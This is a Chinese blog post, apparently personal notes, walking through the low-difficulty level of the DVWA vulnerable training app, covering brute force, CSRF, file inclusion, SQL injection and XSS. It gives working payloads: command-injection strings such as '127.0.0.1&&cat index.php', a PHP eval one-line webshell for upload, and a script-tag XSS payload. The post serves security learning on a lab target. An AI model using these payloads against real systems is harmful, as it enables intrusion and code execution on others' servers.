Dvwa的低难度通关

最新推荐文章于 2023-12-14 14:02:41 发布
最新推荐文章于 2023-12-14 14:02:41 发布
阅读量480 收藏 2
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/loseheart157/article/details/107663430
版权

目录

搭建

使用docker搭建
docker search dvwa
docker pull xxx
docker run xxx
详细说一下搭建后的情况

低难度通关

搭建好后想先看一下源代码的,然后发现有这么多种php文件,应该是说的表示难度。

在这里插入图片描述
难度的选择在这里更改
在这里插入图片描述

brute force

查看low.php的源代码
在这里插入图片描述
发现没有任何的防御手段,我们直接用burp抓包,进行暴力破解
在这里插入图片描述
给password留上标记后我们导入字典开始破解

在这里插入图片描述

到最后就能知道密码是password

Command Injection

查看源代码

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

没有任何防护措施
我们直接可以利用构造与布尔值差不多的命令行来获取信息
例如|ls利用来达到我们的目的
在这里插入图片描述
也可以利用&& 来达到目的
127.0.0.1&&cat index.php

在这里插入图片描述

CSRF

这里构造好url,用户打开url即可成功。
在这里插入图片描述
那么如何诱导用户点击呢?
在这里插入图片描述
用burp构造一个html文件诱导他点击
在这里插入图片描述

File Inclusion

通过文件包含漏洞,利用一下相对路径访问到phpinfo.php
在这里插入图片描述

File Upload

这里没有限制
我们直接写好一句话木马
<?php @eval($_POST['123']) ?>
上传上去

SQL Injection

我们直接 '发现有报错注入
在这里插入图片描述
然后就可以开始用联合查询啥的了
但是结果是这样的
在这里插入图片描述
密码使用了md5加密
我们搜索md5转换,就能得到正确结果
在这里插入图片描述

SQL Injection (Blind)

盲注的话,采用时间盲注就行

XSS (Reflected)

直接采用
<script>alert('hacked')</script>注入
在这里插入图片描述

XSS (Stored)

同上
在这里插入图片描述

h0ld1rs
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA教程(二)——Medium级别
weixin_47610939的博客
07-12 476
dvwa中级难度通关指南
DVWA靶场的搭建
m0_59856804的博客
12-13 1242
DVWA靶场的搭建 PHP study中搭建 Kali中搭建Docker Kali 中搭建DVWA Docker中搭建DVWA
DVWA全级别通关教程
热门推荐
weixin_52515588的博客
03-26 9万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
sqlmap自动化漏洞利用(DVWA初、中、高)
qq_42620328的博客
10-14 6857
sqlmap自动化漏洞利用(DVWA
DVWA难度等级无法改变问题
自在如风
09-05 8185
针对这种情况,需要将之前登录的痕迹抹去,以火狐浏览器为例,退出dvwa登录状态后,将缓存cookie清除,这个只需要进入定制里有个抹去痕迹拖入工具栏即可,以后即可随时清除痕迹。然后重新登录即可成功设计难度等级。 如果同时开了多个浏览器,登录dvwa,需要全部退出,并抹去痕迹,重新登录即可。 亲测可用。 ...
DVWA靶场-SQL Injection(难度、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2694
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA 共12关通关笔记
09-12
DVWA 共12关通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从...
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
新手指南:DVWA 1.9 全级别教程 PDF
08-18
新手指南:DVWA 1.9 全级别教程 PDF格式
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
010107DVWA安全
TangTang_AM的博客
03-27 1964
7-1Web安全-实验环境介绍 1. DVWA介绍 Web应用程序(DVWA)是一个PHP/MySQL Web应用程序。它的主要目标是帮助安全专业人员在合法环境中测试他们的技能和工具,帮助web开发人员更好地理解保护web应用程序的过程,并帮助教师/学生在教室环境中教授/学习web应用程序安全性 DVWA - Damn Vulnerable Web Application 2. DVWA实验环境操作 默认情况下,DVWA系统登陆的用户admin,密码password. 3. DVWA参考文档
DVWA更改等级及服务器核心代码查看(基础小白进来)
chtdgf的博客
01-31 1128
DVWA更改等级及服务器核心代码查看(基础小白进来) 1. 核心代码查看 刚开始的我看到大佬贴出的解说也一脸懵,不知道哪里能查看到核心代码,其实他就在页面右下角啦!(view source) 例如第一题 2.DVWA更改等级 安装的时候出了点问题,默认进来的等级就是impossible。还天真的以为默认为low,按照教程进行尝试,什么结果也出不来。再次提醒和我一样出不来结果的朋友请仔细看一下你的难度等级是否对应! 更改等级也很简单,在DVWA Security中就可以修改了 ...
DVWA通关教程
weixin_62957220的博客
05-18 2202
1.首先先把难度调为low,进行brute force 首先审计代码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query =
DVWA难度(1-4)
weixin_50998641的博客
01-24 680
1.Brute Force( 暴力破解) 开始页面 Username默认为admin 直接使用burp进行爆破 所以密码就是password 输入之后跳转 第一关就OK了 需要注意的是:如果Burp代理使用火狐浏览器自带的代理,则无法抓取本地DVWA数据流量包 有两种解决方法: **一: 把本地的localhost/127.0.0.1换成本机IP ** 二:使用浏览器插件进行代理,不用浏览器本身自带的代理 2.Command Injection( 命令行注入 ) 首先需要了解命令连接符 comma
DVWA 中等难度
h0ld1rs的博客
08-02 582
文章目录Brute ForceCommand InjectionCSRFFile InclusionFile UploadSQL InjectionSQL Injection (Blind)XSS (Reflected)XSS (Stored) Brute Force 相比较,多了这几行代码 然而多出来的这个函数mysql_real_escape_string( $user )就是对一些特殊字符进行了转义,在low难度下可以利用注释#,将sql语句改写。这里就不能了。这里还是可以利用burp进行强爆破。
DVWA安装以及模块使用教程(一)
Estrus5的博客
04-30 1万+
一、DVWA介绍 DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是: 1.Brute Force(密码破解) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.F
dvwa无法修改更改等级 一直impossible 已解决
滕青山博客
02-14 4468
问题 在DVWA Security中将等级修改成了low,但是某个模块还是impossible 解决 假设同时在火狐和谷歌登录了admin账号。火狐运行正常,可是谷歌无法将某个模块修改成low。 解决方法就是:两个浏览器同时退出账号,并在谷歌上删除缓存,或者稍等片刻,打开无痕窗口并访问你的ip或域名/dvwa 这里不要加上/vulnerabilities/某个模块名/ 登录后再次设置安全等级成low即可。 参考:[求助]新人求助!!为什么我将DVWA的级别调为low了,但是在用burpsuit
dvwa靶场cscrf通关
最新发布
06-20
DVWA(Damn Vulnerable Web Application)是一个开源的安全教育工具,它模拟了一个常见的Web应用环境,包含了一系列的安全漏洞,包括Cross-Site Request Forgery (CSRF)。CSRF是一种常见的网络攻击,攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值